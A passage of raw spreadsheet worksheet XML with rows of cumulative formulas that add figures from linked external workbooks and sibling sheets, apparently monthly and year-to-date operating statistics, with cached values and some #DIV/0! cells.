      <c r="G10" s="194">
        <f>'[10]18'!$E$25+'[11]18'!$E$20+'[12]18'!$E$21+'[13]18'!$E$28+'[14]18'!$E$12+'[14]18'!$E$19+'[15]18'!$E$11</f>
        <v>0</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'17'!H10</f>
        <v>39420</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>956947.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]18'!$I$25+'[11]18'!$I$20+'[12]18'!$I$21+'[13]18'!$I$28+'[14]18'!$E$27+'[14]18'!$E$34+'[15]18'!$H$11</f>
        <v>3066.88</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'17'!K10</f>
        <v>52295.42</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>949524.14</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]18'!$L$25+'[11]18'!$L$20+'[12]18'!$L$21+'[13]18'!$L$28+'[14]18'!$H$27+'[14]18'!$H$34+'[15]18'!$K$11</f>
        <v>48331.522</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]18'!$W$110</f>
        <v>281.420765027322</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]18'!$X$110</f>
        <v>257.812607885107</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]18'!$Y$110</f>
        <v>268.301310809278</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]18'!$T$110</f>
        <v>7.625</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]18'!$U$110</f>
        <v>33.525462962963</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]18'!$V$110</f>
        <v>34.4328835227272</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]18'!$Q$110</f>
        <v>1.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]18'!$R$110</f>
        <v>144.83</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]18'!$S$110</f>
        <v>2908.89</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]18'!$D$26+'[11]18'!$D$21+'[12]18'!$D$19+'[13]18'!$D$29+'[14]18'!$D$13+'[14]18'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]18'!$E$26+'[11]18'!$E$21+'[12]18'!$E$19+'[13]18'!$E$29+'[14]18'!$E$13+'[14]18'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'17'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]18'!$I$26+'[11]18'!$I$21+'[12]18'!$I$19+'[13]18'!$I$29+'[14]18'!$E$28+'[14]18'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'17'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]18'!$L$26+'[11]18'!$L$21+'[12]18'!$L$19+'[13]18'!$L$29+'[14]18'!$H$28+'[14]18'!$H$35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6550.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'17'!H12</f>
        <v>154165.86</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5096557.11</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>15514.074</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'17'!K12</f>
        <v>303987.518</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5333093.894</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>260875.697000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>59.4249879271186</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]18'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]18'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]18'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]18'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]18'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]18'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]18'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]18'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]18'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'17'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'17'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>47.8671003669818</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]18'!$W$68</f>
        <v>272.916666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]18'!$X$68</f>
        <v>263.35549132948</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]18'!$Y$68</f>
        <v>266.209983343007</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]18'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]18'!$U$68</f>
        <v>80.0925925925926</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]18'!$V$68</f>
        <v>71.9878077651515</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]18'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]18'!$R$68</f>
        <v>346.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]18'!$S$68</f>
        <v>6081.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3216</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'17'!H14</f>
        <v>50786</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1015329.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5368.05</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'17'!K14</f>
        <v>98437.675</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1891381.781</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>59335.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]18'!$W$71</f>
        <v>219.916666666667</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]18'!$X$71</f>
        <v>218.515579316682</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]18'!$Y$71</f>
        <v>213.781962624709</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]18'!$T$71</f>
        <v>100</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]18'!$U$71</f>
        <v>55.4212962962963</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]18'!$V$71</f>
        <v>50.4962121212121</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]18'!$Q$71</f>
        <v>24.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]18'!$R$71</f>
        <v>239.42</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]18'!$S$71</f>
        <v>4265.92</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'17'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>446.574</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'17'!K15</f>
        <v>5506.043</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>120262.543</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]18'!$W$72</f>
        <v>62.75</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]18'!$X$72</f>
        <v>63.111334867664</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]18'!$Y$72</f>
        <v>61.4011475688932</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]18'!$T$72</f>
        <v>66.6666666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]18'!$U$72</f>
        <v>64.3703703703704</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]18'!$V$72</f>
        <v>51.4509943181818</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]18'!$Q$72</f>
        <v>16.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]18'!$R$72</f>
        <v>278.08</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]18'!$S$72</f>
        <v>4346.58</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'17'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'17'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]18'!$W$73</f>
        <v>62.6666666666667</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]18'!$X$73</f>
        <v>60.7032997762864</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]18'!$Y$73</f>
        <v>62.7754166387792</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]18'!$T$73</f>
        <v>100</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]18'!$U$73</f>
        <v>66.2222222222222</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]18'!$V$73</f>
        <v>53.0575284090909</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]18'!$Q$73</f>
        <v>24.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]18'!$R$73</f>
        <v>286.08</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]18'!$S$73</f>
        <v>4482.30</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'17'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'17'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]18'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]18'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]18'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]18'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]18'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]18'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]18'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]18'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]18'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'17'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'17'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]18'!$W$74</f>
        <v>214.7</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]18'!$X$74</f>
        <v>216.7</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]18'!$Y$74</f>
        <v>221.938783847826</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]18'!$T$74</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]18'!$U$74</f>
        <v>11.5740740740741</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]18'!$V$74</f>
        <v>7.24348958333333</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]18'!$Q$74</f>
        <v>10</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]18'!$R$74</f>
        <v>50</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]18'!$S$74</f>
        <v>611.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'17'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'17'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]18'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]18'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]18'!$Y$72</f>
        <v>9.13649025069638e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]18'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]18'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]18'!$V$72</f>
        <v>4.24952651515152e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]18'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]18'!$R$72</f>
        <v>1.8e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]18'!$S$72</f>
        <v>0.000359</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'17'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'17'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]18'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]18'!$X$73</f>
        <v>133.631109250074</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]18'!$Y$73</f>
        <v>239.247248148145</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]18'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]18'!$U$73</f>
        <v>0.666670833333333</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]18'!$V$73</f>
        <v>68.473133984375</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]18'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]18'!$R$73</f>
        <v>2.880018</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]18'!$S$73</f>
        <v>5784.610359</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]18'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]18'!$E$22</f>
        <v>6344</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'17'!H21</f>
        <v>126853</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2236291</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]18'!$I$22</f>
        <v>8634.58</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'17'!K21</f>
        <v>144905.62</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2211359.62</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]18'!$L$22</f>
        <v>65000.69</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>138.299340425532</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209" t="e">
        <f>'[13]18'!$W$81</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]18'!$X$81</f>
        <v>281.291190028063</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]18'!$Y$81</f>
        <v>275.953276416928</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]18'!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]18'!$U$81</f>
        <v>34.2318672839506</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]18'!$V$81</f>
        <v>36.0279947916667</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]18'!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]18'!$R$81</f>
        <v>147.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]18'!$S$81</f>
        <v>3043.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]18'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]18'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'17'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]18'!$I$17</f>
        <v>4789</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'17'!K22</f>
        <v>117729.57</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>2009190.95</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]18'!$L$17</f>
        <v>134896.782</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>67.448391</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]18'!$W$79</f>
        <v>111.862068965517</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]18'!$X$79</f>
        <v>101.272448029411</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]18'!$Y$79</f>
        <v>102.20140291832</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]18'!$T$79</f>
        <v>60.4166666666667</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]18'!$U$79</f>
        <v>53.1706532921811</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]18'!$V$79</f>
        <v>45.7771793455387</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]18'!$Q$79</f>
        <v>14.5</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]18'!$R$79</f>
        <v>229.697222222222</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]18'!$S$79</f>
        <v>3867.25611111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]18'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]18'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'17'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]18'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'17'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]18'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209" t="e">
        <f>'[13]18'!$W$80</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]18'!$X$80</f>
        <v>85.0235341281979</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]18'!$Y$80</f>
        <v>79.4479538834802</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]18'!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]18'!$U$80</f>
        <v>34.6445473251029</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]18'!$V$80</f>
        <v>32.6055904093014</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]18'!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]18'!$R$80</f>
        <v>149.664444444444</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]18'!$S$80</f>
        <v>2754.52027777778</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]18'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]18'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'17'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]18'!$I$56</f>
        <v>0</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'17'!K24</f>
        <v>25767.79</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>305594.32</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]18'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]18'!$R$6</f>
        <v>87.7931034482759</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]18'!$S$6</f>
        <v>84.008</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]18'!$T$6</f>
        <v>86.0398026967182</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]18'!$O$6</f>
